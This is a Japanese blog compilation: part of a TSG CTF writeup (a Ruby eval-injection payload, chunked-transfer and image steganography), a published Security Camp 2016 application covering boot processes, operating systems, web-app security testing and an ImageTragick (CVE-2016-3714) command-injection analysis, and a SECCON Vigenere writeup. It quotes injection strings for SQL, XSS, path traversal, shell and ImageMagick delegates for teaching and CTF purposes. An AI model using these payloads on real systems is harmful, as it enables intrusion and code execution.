よって,例えばfile = ["\";puts`cat flag`;#", "hoge"] とすると,codeの2行目の文字列は

s = "";puts`cat flag`;#" + IO.binread("hoge".gsub(?/,''))\n

実際は文字列なので "s= \"\";puts`cat flag`;#\" + IO.binread(\"hoge\".gsub(?/,''))\n" であり,これがevalされるわけなので任意のRubyコードが実行可能であることがわかる.

よって,salt=%25s&file[]=";puts`cat flag`;#&file[]=hoge のようなものを投げるとFLAGが読み出せた.

String#%について,文字列にsprintfの埋め込みが2箇所以上ある場合は渡す複数の文字列を配列にする必要があるが,sinatraはちゃんと複数の同名パラメータは配列になるのでこれで良い.

FLAG : TSGCTF{I_COULDN'T_COME_UP_WITH_ANYTHING_BUT_SHA_FUNCTION}

[Stego 100] 3tsg0

このページはstaticか?

公開されているTSGのHP(http://tsg.ne.jp/) と一見同じものが表示される.

curlしてdiffを取って見るが,HTMLについては各ページやリソースへのリンクが変化しているだけ またcss,jsについてはtsg.ne.jp以下のものを取って来ているだけであった. その他与えられているもので怪しいファイルや情報が無いため,注目するべきはHTMLファイルだろうと推測できる.

返却されたHTMLのResponse Headerを見ると,

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN

となっている.(このあたりで本番は投げ出して他の問題を見始めた)

こういった静的なサイトとして不自然な点は Transfer-Encoding: chunked となっていることである.

Transfer-Encoding: chunked とは,データを一度に送信しContent-Lengthヘッダーでサイズを指定するのでなく,データを複数のchunkに分けて送信するようなHTTPのオプションであり,故にこのサーバーは継続的にデータを送ってきているのではないかと推測できる.

require "socket"
socket = TCPSocket.open("external.chals.ctf-day1.tsg.ne.jp",15682)
socket.print "GET / HTTP/1.0\r\n\r\n"
response = socket.read

みたいなことをし,responseを読むと,

...
54
<!DOCTYPE html>
<html lang="ja">
<head>
    <meta charset="utf-8">
    <meta name="d
53
escription" content="東京大学に本拠をおくコンピュータサークルTS
47
Gのウェブサイトです。">
...

等の,通常のブラウザやcurlでは見えていなかった文字列が見えていることがわかる.

目視で確認して16進数だと推測し,末尾に\r\nが付いているようなもののみを抽出すると,

response.lines.select{|e| e=~/^[0-9a-f]{2}\r\n/}
# => 54
# 53
# 47
# 43
# 54
# 46
# 7b
# 49
# ....

のように,明らかにascii文字の範囲内に収まるような16進数がchunkとして送信されていることがわかる

よってこれらをascii文字に変換した後結合してFLAGとなる.

response.lines.select{|e| e=~/^[0-9a-f]{2}\r\n/}.map{|e| e[0,2].to_i(16).chr}.join
# => TSGCTF{I_THINK_IT_DEPENDS_ON_THE_DEFINITION_WHETHER_THIS_SITE_IS_STATIC}

FLAG : TSGCTF{I_THINK_IT_DEPENDS_ON_THE_DEFINITION_WHETHER_THIS_SITE_IS_STATIC}

[stego 100] W

部室の写真(png)が与えられる.

f:id:taiyoslime:20181203192356p:plain

stegsolveで見てあげると画像の各ピクセルのRed,Green,Buleの値のそれぞれ0bit目を色分けした画像が次のようになっている.

f:id:taiyoslime:20181203191228p:plain f:id:taiyoslime:20181203191239p:plain f:id:taiyoslime:20181203191320p:plain

Buleの上半分にRubyのコードのようなものが確認できるが判別しにくいため,ちょうどRedで得た市松模様とXORを取ってみると次のようになる. f:id:taiyoslime:20181203191326p:plain

下半分がGreenと同じような見た目になっていることがわかり,これとGreenとのXOR取るとコードが全貌が判明すると共にFLAGが得られる. f:id:taiyoslime:20181203191921p:plain

FLAG : TSGCTF{'RGB'.bytes.inject(&:^).chr}


明日12/4は moratoriumさんの TSGCTF day3 writeup です.


  1. これは文字列なので実際は "s = \"\" + IO.binread(\"\\\");puts `cat flag#\".gsub(?/,''))\n"

  2. 実際は,"s = \"%s\" + IO.binread(%p.gsub(?/,''))\n"である.また,code全体は"require 'digest/sha2'\n" + "hoge = \"%s\" + IO.binread(%p.gsub(?/,''))\n" + "puts Digest::SHA512.hexdigest(s)\n" となる.

セキュリティキャンプ(seccamp) 2016 の応募用紙を晒す

今年もセキュリティ・キャンプ、通称「セキュキャン」の応募が始まったらしい

www.ipa.go.jp

懐かしい

応募用紙の公開については「課題の内容も異なるしあまり意味のあるものではないのではないか」という意見も少なからず存在するようだが

少なくとも自分が当時応募用紙を書いた時は色々な方が公開されていた過去の応募用紙からその雰囲気だったり内容の書き方だったりを参考にさせていただいた記憶もあり、実は受かった直後からあげようとしてずっとはてブの下書きに入ってたやつだったので出してみた。

あとは当時の原文ママで貼り付けただけなので怪文書です。(ところどころ間違ってる )
間違え探しには打ってつけだと思う。ご笑納ください。

思ったこと

セキュキャン課題についてのあくまで主観的な感想

  • 技術力の優劣・知識の正確性や厳密性というよりは、熱意や やる気・どれだけ手を動かしたか/努力したか、を評価される

これは他の卒業生の方が口を揃えて仰っていることや、Twitterでの講師の方の発言の中にも多々見受けられることであり、私も全面的に同意することである。

その上で意味不明な単語の羅列が出現してもとりあえずggってみるなり、数十行のアセンブリが貼っ付けられて「これから何か感じることを自由に書いてね」みたいなことを言われてもとりあえず何かしら手を動かしてみるなり、そして重要なのはそういった過程をそのまま応募用紙に記述することが大事かなぁと。 (あとこれには私のように知ったかぶりして微妙に変なことを書いてしまうという点でもちゃんと調べることは重要だという反省も含んでいる)

  • 躊躇してないで早めに取りかかったほうがいい

意外と必須問題のポエム制作に時間がかかった記憶がある。せっかく途中まで書いたのに...ということが起きないためにも

これは多分自分の性格の問題なので多くの方は問題ないと思うのだが、 ギリギリまで手を付けなかった結果、結局定期考査1日目が終わった夕方に、勉強をする友人に窘められながら締め切り10分前に提出をする羽目になり間に合うかどうかかなりヒヤヒヤだった上、いくつかの課題の回答がかなり雑になってしまった。 早め早めに課題に取りかかるということは別にこれに限ったことじゃないだろというツッコミが来そうだが一応書いておきます。

ちなみに応募する際の入力フォームですが(少なくとも去年まではそうでしたが)

60分程度でセッションが切断され、入力内容が無効となります。

ので頑張って書いたデータが消失する可能性が無きにしもあらずなので注意


以下本編です

先程も述べましたが、少なくとも技術的な内容に関していくつか間違っている部分があるのを確認しているので 内容の正誤についての責任は負えません 宜しくお願い致します。

応募用紙

問題一覧:

https://www.ipa.go.jp/files/000053055.pdf

必須問題

q1

今まで作ったもの・やったこと等自慢のコーナーでした。あまりにも長かったのと、他愛のないものがグダグダと書かれて居るだけだったので省略

q2

q2-1

あなたが経験した中で印象に残っている技術的な壁はなんでしょうか?

JavaScriptでのオブジェクト指向プログラミング手法

無論ながらJavaScriptにクラスという概念はないが、本当にオブジェクト指向プログラミングは可能なのかということ。 Webサイト等では可能だとの記述は散見されるが、それならデータ隠蔽や継承はどのように行われているのかということ。

q2-2

その壁を乗り越えるために取った解決法を具体的に教えてください。

8割は書籍を読むことで解決した、以下その書籍のリストである。

あとは "ひたすら書いてみること" である。

壁に対する答えを非常に簡単に述べると

そもそもオブジェクト指向の本質的な部分は、メッセージングとカプセル化にあり、この要件を満たす手法として「オブジェクト指向プログラミング」がある。 ゆえに Class = オブジェクト指向ではなく、実現手段にはいくつかの手段がある。 その点、JavaScriptは、プロトタイプベースのオブジェクト指向であり、クロージャーとプロトタイプチェインをうまく用いる形でオブジェクト指向プログラミングは可能である。 その中にもモジュールパターン系統とコンストラクタパターン等他にも複数のイディオムがあるが、本質的に実現していることは同じである。各々に細かな振る舞いの違いがあるため用途によってうまく使い分けを見極める。

また、もしJavaScriptでクラスベースのオブジェクト指向プログラミングをしたいのならば、TypeScrpt等のaltJSを用いると可能である。 大規模プロジェクトで生のJS書くことはめったになくこれらのaltJSを用いることが多い。

あとは、JavaScriptの次の規格であるECMAScript 2015(ES6)では、Class記法が導入される予定である(やはり内部ではプロトタイプベースのものとして処理されている) 現段階ではまだブラウザによって実装の程度がまちまちなため、ES6の記法でコードを書くにはBabel(旧6to5)等でのトランスパイルが必要になる。

無論、オブジェクト指向プログラミングに拘る理由もなく、関数型プログラミングという選択肢もなくはない。 ただ、これも生のJSでやろうとするとかなり中途半端なことになってしまうと思われる。特に、Array.prototype.reduce()のはとても関数型とは言いがたい実装になっていたりする。これも、PureScript等のaltJSに頼るしかない。

これは余談であるが、altJSの中には他の言語をJSに変換するものも多くあり、ClojureScript (Clojure => JavaScript)、ghcjs(Haskell => JavaScript)等はたまに書いてる人を目撃することもある。 他のaltJSはこちらを参照していただきたい。(https://github.com/jashkenas/coffeescript/wiki/list-of-languages-that-compile-to-js)

かつ、良くなかった点は書籍を見て考え方を理解した私はそれで満足してしまったことだ。

書籍を眺めて、ほうほう、こういうことかと理解したつもりになっていても、それは所詮机上の空論である。 私は、完璧に理解してからでしかコードを書きたくなかったし、かと言って写経もあまり好きではない人間だったが、それが習得を完全に遅らせていたと今ならわかる。 未だにどうしても完璧なコードを書きたいきらいがあるが、とりあえずなんでもいいから実践することで本質を理解し自分のものにしていくということも、このことを通して重要なことだと感じた。

q2-3

その壁を今経験しているであろう初心者にアドバイスをするとしたら、あなたはどんなアドバイスをしますか?

JavaScriptを理解する上でO'REILLYのサイ本を読むことは欠かせない。他の言語とは少し違うパラダイムも多いのでまずはその言語仕様をある程度理解する必要がある。その上で、その特性を活かしたイディオムを理解するほうが良いと考える。 ただ、オブジェクト指向に関して言えば、今からならネット上にある古き慣習よりも、Babel等のトランスパイラを用いてES6のclass記法を使う方が遥かに無難である。また、現在の書籍はES5以前のものがほとんどだが、ネット上にはES6の記事もかなり出ている上、他にもES6の方が優れている部分が多いので(継承のextends、ブロックスコープのconstとletやアロー演算子、デフォルト引数など)できればES6の習得が望ましい。

また、パラダイムや概念を理解することももちろん重要ではあるが、写経でも良いのでとりあえず書いてみることが良いと思う。実際に手を動かすことで得るものも多い。

q3

q3-1

あなたが今年のセキュリティ・キャンプで受講したいと思っている講義は何ですか?(複数可)また、そこで、どのようなことを学びたいですか?なぜそれを学びたいのですか?

受講したいと思うものが多すぎるため、最も興味のある講座を挙げさせていただくと、 6-Aの次世代プラットフォームのセキュリティモデル考察*1 である。

近年のフロントエンドの動向は凄まじく速く、新しい技術が本当に次々と生まれ、1ヶ月前まで人気を博していたライブラリがオワコン(コンテンツの寿命が終わった、つまり使い物にならなくなった。)と呼ばれ消えていくサイクルを高速に繰り返している。 しかし、その中で相対的にセキュリティは確実に疎かになっているように私も強く感じる。 特に最近はフロントエンドのバックエンドに対する相対的な重みは増す一方であるにもかかわらず、その発展速度からセキュアなコーディングをする手法は体系的にまとめらることがない現状である。さらにサードパーティ的なプラグインを使うことは開発においてほぼ必須であるため、更に状況は悪いように思える。

その上で、自分もOSSや自分のプロジェクトでこういったことに関わる身として知っておかなければならないと考えるから、ということが興味の理由である。

q3-2

あなたがセキュリティ・キャンプでやりたいことは何ですか?身につけたいものは何ですか?(複数可)自由に答えてください。

私は今まで書籍やネット等でほぼ独学的にセキュリティに関する勉強をしてきた。 その中で、先日行われた日本情報オリンピック(JOI)の予選でCTFの日本チームで活躍している方と話す機会があった。 結果は自明なのが、自分の知識の体系性のなさ、厚みのなさを本当に強く実感した。 その上で、現場で活躍されているプロの方々から直々に学べるというセキュリティ・キャンプは心から参加したいものである。

私はセキュリティ・キャンプで体系的な知識を得ること、そしてその知識をただ得るだけでなく活かす・貢献する方法を考えることが目標である。

また先日大きな衝撃を受けたのはNHKで放映されているプロフェッショナル 仕事の流儀での名和 利男さんの特集である。 サイバーセキュリティに関する第一人者の方の特集ということで、テレビはいつもほとんど見ないのだが何気なくで視聴した。 名和さんのサイバーセキュリティという職に対する極めてストイックな姿勢にも感動を覚えたが、何より背筋が凍るような衝動を感じたのは現在のサイバー犯罪の実情だった。 これだけ日本の中枢機関が体外的な脅威に晒されている状態にあることをなぜ知らなかったのかと強く感じた、ということも理由の一つに挙げられる

選択問題

q3

RAMは主記憶装置、HDDやSSDなどは補助記憶装置と呼ばれます。一般にCPUは主記憶装置上のプログラムしか実行できません。ではなぜ、私たちは普段から補助記憶装置に書き込んだプログラムを実行できているのでしょうか?パソコンの電源を入れてからのストーリーを考えてみてください。

設問のとおり、通常のコンピューターはメインメモリ上のプログラムしか実行することができない仕組みになっている。しかし、メインメモリは揮発性である上容量も比較的小さいため、補助記憶装置にプログラムを書き込んで置くのである。 そして、補助記憶装置に書き込んであるプログラムは適宜プログラムローダーによってメインメモリに書きだされ、実行される仕組みになっている

しかし、この働きを助けるプログラムローダー自身も無論プログラムでメインメモリ上にあるはずである。しかし、電源を入れた直後に揮発性のメインメモリ上には何もないはずである。さらに言えばOSも補助記憶装置に保存しておくことが一般的であり、OS自身も存在しないはずである。

これを解決しているのがブートローダーである。

まず1次ブートローダー(これをブートローダという呼び方をしない場合もある)は不揮発性のROM内に保存されていることが多い。コンピューターの電源を入れると、CPUは外部からの指示なしにこの領域にあるプログラムである1次ブートローダーを実行するように元々設計されている。この流れをPower On Slef Test(POST)と呼ぶ。 一般的な1次ブートローダーには次のようなものある。

そして呼びだされた1次ブートローダーはブートできる各種デバイスから最も優先順位の高いもののブートセクタ(パーティッションのある記憶媒体ならMBR)から2次ブートローダー(カーネルローダーとも)を読み込む。これは、補助記憶装置から段階的にOSをメインメモリに読み込んでいき、最後にOSを実行する仕組みになっている。 2次ブートローダーには次のようなものがある

これで、晴れてプログラムローダーも読み込まれ私達は補助記憶装置に書き込んだプログラムを実行することができるのである。

q5

PCなどに搭載されているOSは「汎用OS」と呼ばれますが、それに対して、家電やAV機器などの「組込みシステム」に搭載されているOSは「組込みOS」と呼ばれます。組込みOSと汎用OSの違い、「OSが無い」や「ベアメタル」という環境、そもそもOSとは何なのか?など、あなた自身はどう考えているのかを、あなた自身の言葉で自由に説明してください。(「正しい答え」を聞いているわけではありません。あなた自身の考えを教えてください)

先に結論を言ってしまうと、OSに関して共通して言えることは、計算機上の重要資源であるCPU,Memory,I/Oを抽象化、管理するものである。しかし、OSの用途や目的によっては資源の管理に対する関心やアプローチ、程度が違ったり、またこの他に別の機能を追加する形になっていたりするのである。 それを以下OSを幾つかに分けて論じていきたい。

  • 汎用OS

汎用OSとは、Windows,Mac OS,Linuxなど、その名の通り汎用的な利用を想定したOSのことである。 一般的に「OS」という言葉を使うとき汎用OSを指すことが多いように感じる。

これらの特徴は不特定多数の人間による応用アプリケーションを通しての操作を期待している、ということである。 仮に、先述したOSの基本的な機能だけを有したコンピューターがあっても、現代で汎用的に使ってもらうことはまずありえない。 現代の汎用OSはこれらの機能の上に、ファイラ等のシステム・アプリケーションをGUIとして提供しているのである。 そしてこの上に任意のアプリケーションを動かすことができる仕組みになっているのである。

このように、カーネルとシステムを機能を合わせたものを「汎用OS」と呼ぶことが多いように感じる。

そして、この「汎用的な利用に対応しなければならない」ことが汎用OSの特徴を大きく影響している。

まず、主役である応用アプリケーションを任意のデバイスで動かすための、抽象化した共通API(若しくはABI)が必須である。 資源の保護や抽象化も必須である。 CPUやメモリを不正に獲得するプログラムがあったとしても適切に資源を配分していく必要がある。このためにCPUに関していえばTSSのような機能は欠かせない。 また、メモリで言えアプリケーション同士でメモリ資源が衝突を起こさないように仮想メモリの機能も必要である。

  • 組み込みOS(専用OS)

組み込みOS不特定多数の利用を心配しなくてよく、 かつ、何をするかの用途も明確に決まっており、その用途に必要なもののみを搭載しそれらのみを特化させた機能を持っているということが最大の特徴(汎用OSは、各ユーザーが自分好みのことを行うために多くの機能が搭載されているわけであり、そういったものはいらない訳である。)

TSSによるCPU資源の配分機能、仮想記憶方式(ページングやセグメント方式等)でのメモリ保護ははっきりいてそこまで重要ではない場合が多いと考える。 CPUやメモリ等を無限に食い尽くすようなプログラムはそもそも動かさないだろうし、万一おきたとしてもその対策は最小限でいいはずである。 また共通API(ABI)も必要なのか。他者が利用するならあれば便利だろうが、汎用OSのように綿密に定義する必要はないし絶対に必要な条件ではないだろう。

むしろ、制御プログラムをマルチタスクで動作させ少ないハードウェア資源で効率的に動作しコストを削減するといったことに関心があるように感じる。 例えば、組み込みOSはRTOSの特徴を持つ場合が多い。主要な機能である資源管理において、時間資源の優先度に基づく配分と実行時間の予測可能性を提供することに特化している。汎用OSに比べてリアルタイム性を重視しているということだ。

逆にその他に関しては汎用OSに比べて遥かに簡素な機能でOSの基本要件であるCPU、メモリ、I/Oの管理をしているわけだ。

  • 一部の組み込みOS

一部の組み込みシステムではWindows Embedded等が搭載されていることもある。これらのOSはあくまで「組み込みOS」ではあるが、不特定多数の多岐に渡る使われ方を想定しているため、インターフェースは抽象化されている必要である。

だが、「最終的な」用途は不特定多数からの利用ではないため、資源管理に対する関心は組み込みOSに近い部分も多い。

  • その他

また、独自ハードウェアなど、そもそもこういったOSの機能すらも必要としない場合もあるだろう。その場合はそれで十分なのである。プログラムで各デバイスを直接指示すればいいわけであり、OSはコンピューターを動かすための必要条件ではない。

また、最近ではベアメタル呼ばれるものがある。 これには、2つの意味があり、1つは上記のようなOSがないコンピューターのことである。 また、コンピューターの仮想化の分野でもベアメタルという言葉が使われる分野がある。 ホスト型の仮想環境は、ホストOS上に仮想化ソフトウェアを起動させ、更にその上でゲストOSを実行する形になる。ゲストOSからハードウェアにアクセスするためにはホストOSを経由しなければならないためオーバーヘッドが生じるが、ハイパーバイザー型のベアメタル呼ばれる仮想環境は、ホストOSを必要としないため、ゲストOSがハードウェアを直接制御できる形式になり速度低下を抑える事ができるのである。 コンピューターの資源を管理するための機能をもつものが2つあっても非効率なだけであるのは明らかである。ただ、ABIは抽象化する必要があるためハイパーバーザーと呼ばれるものがユーザー・アプリケーションとホストOSの間を仲介する。

q6

IDとパスワードを入力してユーザの認証を行うWebアプリがあります。あなたがこのアプリに対してセキュリティテストを行う場合、まず、どのようなテストをしますか? なぜそのテストを選択したのか、その背景や技術的根拠と共に記載してください。アプリの内部で使われている技術やシステム構成に、前提を置いても構いません。

以下の脆弱性は特にフォーム等からユーザーの入力を求める際に主に発生するものである

  • SQLインジェクションの可否 FORM等で入力されたデータをエスケープせずにそのままSQLのクエリの一部として渡している時等に、意図しないSQL文を発行させデータベースを不正操作する脆弱性

    以下にその非常に簡単な例を示す

    PHPにおいて $email = $_POST['email']; $password = $_POST['password'];

    とPOSTデータを受け取り

    $sqlreq = "SELECT * FROM users WHERE email = '$email' AND password = '$password'";

    SQLリクエストを発行させたとする。

    このとき、あるユーザー名に対して、passwordに例えば ' OR 1=1-- と指定すると クエリ全体は真を返してしまう。

    これらに対してサニタイジングやバインドバインドメカニズムが適用されているか。

  • XSSの可否 フォームの値をエスケープなしでHTML中に出力したとき、もし、フォームの値に次のパターンのような文字列を指定した時、任意のJavaScriptの実行できる脆弱性

    主なパターンは以下のとおり

    • シングルクォートを使用した場合'><script>alert('hogehoge')</script>
    • ダブルクォートを使用した場合"><script>alert("hogehoge")</script>
    • imgタグのsrc属性にJavaScriptを使った場合"><img src="javascript:alert('hogehoge')">
    • IE限定でスタイルシートの柔軟性によるXSSが生じる場合" style="left:expression( alert('test') )"
    • JavaScriptに入力データが動的に埋め込まれている場合'+alert('hogehoge')+'
    • XMLHttpRequest(XHR)によってJSONをやりとりしている場合

    これらに対して正しく入力チェックやサニタイジングが行われているか。 また特にXMLHttpRequest(XHR)によってJSONをやりとりしている場合はレスポンスヘッダにX-Content-Type-Options: nosniffをつけているか、XHRからのリクエストのみに対応するようにしているかどうか

    またサニタイジングも独自のものではなく信頼性のあるもの(PHPであればhtmlspecialchars)等を利用しているかどうか

以下の脆弱性は特にID、パスワードを扱うことから発生するものである

  • CSRFの可否 悪意のあるWebサーバーが、訪れたユーザーの外部Webアプリの認証データや識別データを利用しそのWebアプリに対してユーザーの意図しない不正な操作を行うこと つまり、Webアプリ側がなんらかの値(セッションやページトークンで)認証することで、外部から誘導されたの不正なHTTPリクエストを拒否しているかどうか。

    • 認証やセッション管理の弱点の有無
      • Session Hijack(セッションハイジャック)の可否 セッションの生成に問題があるとき、推測または総当りで有効なセッションを奪取
      • Session Replay セッションの有効期限の指定がなかったり長過ぎたりした場合、漏洩時(例えばXSSや盗聴)にそのセッションIDを利用される。
      • Session Fixation ログイン前と後でセッションIDが変化しない場合

      これらの特徴があるかどうか。またHTTPSのCoockieにはSecure属性が指定されているかどうか

    • HTTPヘッダインジェクションの有無 HTTPヘッダにおける特殊文字である改行コードを悪用し、本来通信内容に含まれないヘッダを挿入する。 例えばSet-coockie属性を挿入し任意のCoockieを指定しSession Hijackに繋がる
  • 機密情報のhiddenでのhtmlへの埋め込みの有無 ユーザー登録などの際の確認画面にて、 セッション変数やハッシュを利用せずIDやパスワード等をそのまま表示するとユーザー側にテンポラリファイルととして機密情報が残ってしまうことがあるため。

  • 暗号方式の有無 脆弱性の見つかった暗号方式や通信を用いてるかどうか。

以下の脆弱性は一般的なWebアプリに共通して当てはまるもののうち、特に留意する必要のあるもの

  • OSコマンドインジェクションの可否 ユーザーから入力を受け取るとき、

    • Perlのexec(),system,...
    • PHPのexec(),passthru(),proc_open(),shell_exec(),system()
    • Pythonのos.system(),os.popen()
    • Rubyのexec(),system(),`` 等にエスケープせずに文字列を渡してしまう場合、文字列にシェル文字を含むことによって任意のシェルコマンドを実行させる脆弱性。 シェル文字とは、シェルにおいて特殊な意味を持つ* ? {} [] <> () ~ & | \ $ ; ' \ " \n \t ` スペース 等の文字である。

    これらに対して、正しくサニタイズされているか。 またサニタイジングも独自のものではなく信頼性のあるもの(PHPであればescapeshellarg)等を利用しているかどうか

  • エラー処理 サーバー側でのエラーは内部のOSやフレームワークの情報につながり、攻撃への手がかりになることがある。データベース(もしくはデータベースドライバ)が返すSQL関係のエラーメッセージも同様である。 これらに対して、エラーハンドリングが正しく行われているかどうか。

  • 脆弱性の見つかったソフトウェアやプラグイン等、また更新されていないWebサーバーソフトウェア(Apache等)や言語の利用の有無

  • Forceful Browsing (強制的ブラウズ) 作業用フォルダなどの意図しない消去忘れ(./git等)

  • Path Traversalの有無 Webブラウザからはドキュメントルートより上にはアクセスできないが、Webアプリケーションは通常どこでもアクセスできることを利用し、例えばWebアプリケーションがクエリからファイルを読み出すような仕様のとき、それに../../../../etc/passwordのようなパラメーターを投げることでファイルに不正にアクセスできる可能性がある。

  • クライアント側のコメント HTMLやJavaScriptのコメントからサーバーの仕様を推測できるようなコメントがあるかどうか。

このような項目全てを手動で行うことは非常に手間がかかるため、実際のテストは脆弱性検出ツールを用いることは多いと思われる。

主な、Webアプリケーションに対する脆弱性検出ツールは次の通り

  • OWASP ZAP
  • Paros
  • Ratproxy 
  • Metasploit(実際にexploitを打ってみて脆弱性の挙動の確認等)

他にもツールは多く存在する。 ただ、自動ツールでは、複雑な手順だったり、特殊な攻撃パターンである脆弱性は検知できない場合もあるので、手動での検査と一長一短の関係にあると考える。

q11

2015 年に発行された CVE の内、あなたが興味を持った”サーバに存在した”脆弱性について1つ提示してください。その脆弱性を悪用した攻撃を検知する方法について詳細に記述してください。また、興味を持った理由を記述してください。 CVE番号:CVE-2015-◯◯◯◯

CVE-2016-3714 - Insufficient shell characters filtering leads to(potentially remote) code execution (シェル文字列の不十分なフィルタリングによる(潜在的なリモート)コード実行の脆弱性) http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-3714

拡張子「svg」「mvg」ファイルのアップロードにより、サーバ上でのコマンドシェルの実行(OSコマンドインジェクション)が遠隔で可能となる 例えば、ウェブサーバーにアップロードされた画像ファイルがImageMagickを用いて自動処理されている場合などが想定される。

  • 脆弱性の原理

    ImageMagick ではdelegateと呼ばれる外部ライブラリによるファイルの処理が可能であり、入力ファイル名や出力ファイル名など実際のパラメータの値と、設定ファイル delegates.xml で指定されたコマンド文字列によって実行あされる。既定の delegate のコマンドの1つが、以下の HTTPS要求の処理に利用されている。

    <delegate decode=”https” command=””curl” -s -k -o “%o” “https:%M””/>

    ImageMagickはcommandの部分のコマンドを実行する。%Mには入力ファイル名が渡される。しかし%Mを置換する際にshellの特殊文字エスケープを実施していないので、 例えば

    convert 'https://pbs.twimg.com/profile_images/552044402504253441/FhMNjVRe.png"|ls "-l' taiyoslime.png を実行すると

    "curl" -s -k -o "taiyoslime.png" "https://pbs.twimg.com/profile_images/552044402504253441/FhMNjVRe.png"|ls "-l" が実行され、lsも実行されることとなる。

    そして、ImageMagickはこの処理を画像ファイルの中に隠すことができる。

    ImageMagickにはSVGとMVG(ImageMagick独自画像フォーマット)のcoderがあり、これらは外部のURLやファイルを参照できる。 例えば以下のMVGファイルは外部URL https://hogehoge.com/hoge を含む。

    push graphic-context viewbox 0 0 1024 720 fill 'url(https://hogehoge.com/hoge)' pop graphic-context

    この外部URL参照に対してもdelegateが実行される。この例ではHTTPS formatだとみなされ、HTTPSdelegate commandが実行され、任意のプロセスが起動出来てしまう

    さらに、ImageMagickはそのファイルがどのフォーマットのファイルかについて

    • マジックバイト
    • format: filename形式のprefix
    • 拡張子

    の優先順位でチェックする。SVGやMVGはマジックバイトがチェックされるので、拡張子でpngなどを指定していたとしても、中身がSVG/MVGならばSVG/MVGと解釈されてしまう。

    そのため、MVGファイルをアップロードしconvertでファイルを処理しようとするとMVGのcoderが実行され、URLを参照している部分でコードを実行可能ということになる。

    今回の脆弱性の根本的原因は、delegateの機能で外部コマンドを呼び出す時にsystem関数を利用していたが、shellの特殊文字エスケープを実施していなかったことにあると考える。 また、他に発見された以下のImageMagick脆弱性についてだが、すべてこれに起因するものになっている。

    • CVE-2016-3715: ephemeral:/ プロトコルを利用した遠隔からのファイルの削除
    • CVE-2016-3716: msl:/擬似プロトコルを利用した遠隔からのファイルの移動
    • CVE-2016-3717: label:@プロトコルを利用した遠隔からのファイル内容の閲覧
    • CVE-2016-3718: SSRF(Server Side Request Forgery)

    これら含めた全てのPoCが公開済みである。(https://github.com/ImageTragick/PoCs) metasploitでもこの脆弱性へのexploitに既に対応している(https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/fileformat/imagemagick_delegate.rb

  • 攻撃を検知する方法 OSコマンドインジェクション一般に言えることだが、上の脆弱性全てに言えることはconvertの引数にshell文字* ? {} [] <> () ~ & | \ $ ; ' " \n \t スペース が含まれているかどうかに尽きる。 もしくは、サーバーのlogに、自分が実行した覚えのないコマンドが実行されいているかどうかで攻撃されたかどうかの検出可能はである。

  • 対策

    • 引数のシェル文字の無効化・サニタイズ
    • policy.xmlへのcoderの指定を追加する
    • 最新版7.0.1がこれらの脆弱性の修正版としてリリースされたが、一部の脆弱性が依然として解決されていないため利用は推奨されない。
  • 影響範囲

    CERT/CCによれば主要ディストリビューションの多くが影響を受ける。

    ImageMagickプラグインとして利用している主なアプリケーションとしては

    等がある。

    更に、C,C++,Go,Java,Python,Ruby,PHP,Perl 等のAPIを提供している(http://www.imagemagick.org/script/api.php)ため、それらを使用しているプログラムも影響される

  • 興味を持った理由

    実は、共通問題1で回答したTwitterBotのサーバーサイドのプログラムに、画像処理の機能としてnode.jsのnode-imagemagickモジュールを利用していたのである。 日頃どこかで脆弱性が見つかったというニュースを耳にしても、自分の今使っている無数の「今のところ安全と言われている」ソフトウェアを眺めながらどこか遠い存在のような気がしていたし、ましてやImageMagickで言えばサーバーサイドの画像処理では鉄板のような存在でありこれだけ使われているソフトウェアに脆弱性があるなんて夢にも思わなかった。 それが、今制作しているソフトが危機に晒されてる状態にあるのである。(実際exploitを打ってみたところOSコマンドインジェクションが可能であった。) 新鮮な体験であるとともに、ソフトウェアのセキュリティの奥深さ、信頼性の脆さに気付かされた。

*1:HTMLとJavaScript技術を用いたセキュリティの講義だった

Vigenere - SECCON 2016 Online CTF

Problem

Vigenere


k: ????????????

p: SECCON{???????????????????????????????????}

c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ


k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe


|ABCDEFGHIJKLMNOPQRSTUVWXYZ{}

-+—————————-

A|ABCDEFGHIJKLMNOPQRSTUVWXYZ{}

B|BCDEFGHIJKLMNOPQRSTUVWXYZ{}A

C|CDEFGHIJKLMNOPQRSTUVWXYZ{}AB

D|DEFGHIJKLMNOPQRSTUVWXYZ{}ABC

E|EFGHIJKLMNOPQRSTUVWXYZ{}ABCD

F|FGHIJKLMNOPQRSTUVWXYZ{}ABCDE

G|GHIJKLMNOPQRSTUVWXYZ{}ABCDEF

H|HIJKLMNOPQRSTUVWXYZ{}ABCDEFG

I|IJKLMNOPQRSTUVWXYZ{}ABCDEFGH

J|JKLMNOPQRSTUVWXYZ{}ABCDEFGHI

K|KLMNOPQRSTUVWXYZ{}ABCDEFGHIJ

L|LMNOPQRSTUVWXYZ{}ABCDEFGHIJK

M|MNOPQRSTUVWXYZ{}ABCDEFGHIJKL

N|NOPQRSTUVWXYZ{}ABCDEFGHIJKLM

O|OPQRSTUVWXYZ{}ABCDEFGHIJKLMN

P|PQRSTUVWXYZ{}ABCDEFGHIJKLMNO

Q|QRSTUVWXYZ{}ABCDEFGHIJKLMNOP

R|RSTUVWXYZ{}ABCDEFGHIJKLMNOPQ

S|STUVWXYZ{}ABCDEFGHIJKLMNOPQR

T|TUVWXYZ{}ABCDEFGHIJKLMNOPQRS

U|UVWXYZ{}ABCDEFGHIJKLMNOPQRST

V|VWXYZ{}ABCDEFGHIJKLMNOPQRSTU

W|WXYZ{}ABCDEFGHIJKLMNOPQRSTUV

X|XYZ{}ABCDEFGHIJKLMNOPQRSTUVW

Y|YZ{}ABCDEFGHIJKLMNOPQRSTUVWX

Z|Z{}ABCDEFGHIJKLMNOPQRSTUVWXY

{|{}ABCDEFGHIJKLMNOPQRSTUVWXYZ

}|}ABCDEFGHIJKLMNOPQRSTUVWXYZ{


Vigenere cipher

https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher

Writeup

ヴィジュネル暗号の問題(ご丁寧にWikiのリンクまである)。

plainの一部が解っているのでKPAして残りの5文字を総当りしてhashと一致するか見て終わり。

